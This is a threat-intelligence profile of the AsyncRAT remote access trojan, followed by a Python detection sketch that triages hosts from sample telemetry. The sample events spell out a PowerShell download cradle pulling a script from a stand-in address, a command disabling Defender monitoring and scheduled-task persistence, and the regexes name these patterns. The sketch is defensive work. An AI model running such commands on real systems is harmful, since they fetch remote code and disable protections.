Overview
AsyncRAT is an open-source remote access trojan written in C# and published on GitHub by its developer “NYAN-x-CAT” in early 2019. Originally presented as a legitimate remote administration tool, AsyncRAT has been extensively weaponized by cybercriminals and state-aligned threat actors. Its open-source nature allows anyone to compile custom builds, add plugins, and modify its behavior, which has led to a proliferation of variants in the wild. AsyncRAT consistently ranks among the most commonly observed RATs in enterprise threat telemetry. Its combination of a clean codebase, active community contributions, and comprehensive feature set has made it a go-to tool for attackers across the skill spectrum, from script kiddies to sophisticated APT groups conducting targeted espionage operations.
Capabilities
AsyncRAT provides full remote control over compromised Windows systems through an asynchronous communication model built on .NET’s async/await pattern, enabling efficient handling of multiple simultaneous connections. Core features include remote desktop viewing and control, keylogging, a file manager with upload and download, process and service management, a registry editor, shell command execution, and system information gathering. The RAT supports dynamic plugin loading, with community-developed modules adding capabilities such as cryptocurrency mining, browser credential harvesting, webcam streaming, audio recording, reverse proxy, and HVNC (Hidden Virtual Network Computing) for stealthy browser session manipulation. Communication is encrypted using TLS with certificate pinning, and the RAT includes anti-analysis features such as sandbox detection and debugger checks.
Distribution Methods
AsyncRAT is delivered through diverse attack vectors owing to its open-source accessibility. Phishing emails remain the primary distribution method, with payloads embedded in Office documents, JavaScript files, or Windows shortcut (LNK) files. Threat actors frequently leverage multi-stage delivery chains involving PowerShell scripts, VBScript, and batch files that download the final payload from attacker-controlled infrastructure. ISO and IMG disk image files have been used to bypass Mark-of-the-Web protections. More advanced campaigns employ process injection, reflective DLL loading, and fileless execution techniques. AsyncRAT has also been distributed through compromised websites, fake software download pages, and malicious advertisements. SEO poisoning campaigns have targeted users searching for popular software, redirecting them to pages serving trojanized installers bundled with AsyncRAT.
Notable Campaigns
AsyncRAT has been used in numerous high-profile campaigns. In 2023, Microsoft and other vendors documented campaigns by North Korean threat actors using AsyncRAT in attacks against cryptocurrency firms. The Operation Jacana campaign in 2023 used AsyncRAT against governmental entities in Latin America. Throughout 2024, multiple APT groups incorporated AsyncRAT into their toolkits, attracted by its customizability and the difficulty of attributing open-source tools to specific actors. A large-scale campaign in late 2024 used AI-generated PowerShell scripts to deploy AsyncRAT through multi-layered obfuscation, demonstrating the evolving sophistication of its delivery mechanisms. In 2025, AsyncRAT variants with enhanced HVNC modules were observed targeting banking sector organizations for session hijacking.
Detection & Mitigation
Detecting AsyncRAT requires monitoring for its characteristic behaviors: outbound TLS connections to non-standard ports, scheduled task or registry run key persistence, and .NET process injection into legitimate Windows binaries. Network signatures can identify AsyncRAT’s handshake pattern and certificate characteristics. Endpoint detection should flag suspicious PowerShell download cradles, execution from user temporary directories, and attempts to disable Windows security features. YARA rules targeting AsyncRAT’s mutex patterns, configuration structures, and characteristic string artifacts are effective for identifying known variants. Mitigation includes restricting script execution through constrained language mode, implementing network segmentation, deploying EDR with behavioral analysis, blocking known AsyncRAT C2 infrastructure at the firewall level, and monitoring for anomalous scheduled task creation.
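As an added illustration (not code from the original article or from AsyncRAT itself), the following Python sketch applies the behavioral indicators listed above to constructed sample telemetry and escalates hosts that exhibit several of them together. The event format, hostnames, and the 203.0.113.x / 198.51.100.x addresses are assumptions, and the regexes are generic behavioral heuristics rather than AsyncRAT-specific signatures.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not real AsyncRAT traffic): (event_type, host, detail).
# "process" carries the command line, "registry" the key written, "tls" the destination.
SAMPLE_EVENTS = [
    ("process", "WS01", r"powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1'))"),
    ("process", "WS01", r"C:\Users\alice\AppData\Local\Temp\svchost.exe"),
    ("registry", "WS01", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    ("process", "WS01", r"schtasks.exe /create /sc minute /mo 1 /tn Updater /tr C:\Users\alice\AppData\Local\Temp\svchost.exe"),
    ("process", "WS01", r"powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("tls", "WS01", "203.0.113.10:6606"),
    ("process", "WS02", r"C:\Windows\System32\notepad.exe"),
    ("tls", "WS02", "198.51.100.7:443"),
]
COMMON_TLS_PORTS = {443, 8443}  # assumed baseline for "standard" TLS ports

# Each rule: (behaviour label, event type it applies to, case-insensitive regex on the detail).
RULES = [
    ("powershell_download_cradle", "process",
     r"powershell.*(DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\bIEX\b|Invoke-Expression)"),
    ("temp_dir_execution", "process", r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\"),
    ("scheduled_task_creation", "process", r"schtasks(\.exe)?\s+/create\b"),
    ("security_tampering", "process", r"Set-MpPreference\s+-Disable|DisableRealtimeMonitoring"),
    ("run_key_persistence", "registry", r"\\CurrentVersion\\Run(Once)?\\"),
]

def classify(event_type, detail):
    """Return the set of behaviour labels a single event exhibits."""
    labels = {name for name, etype, pattern in RULES
              if etype == event_type and re.search(pattern, detail, re.IGNORECASE)}
    if event_type == "tls":
        port = int(detail.rsplit(":", 1)[1])
        if port not in COMMON_TLS_PORTS:
            labels.add("nonstandard_tls_port")
    return labels

def triage(events):
    """Aggregate behaviours per host: one alone is weak evidence, several together are not."""
    per_host = defaultdict(set)
    for event_type, host, detail in events:
        per_host[host] |= classify(event_type, detail)
    return dict(per_host)

def hosts_to_escalate(events, min_behaviours=3):
    """Hosts showing at least min_behaviours distinct RAT-style behaviours."""
    return sorted(h for h, b in triage(events).items() if len(b) >= min_behaviours)
```

On the constructed sample, WS01 accumulates all six behaviours and is the only host returned by `hosts_to_escalate`, while WS02 (a signed system binary and a normal port 443 connection) produces none.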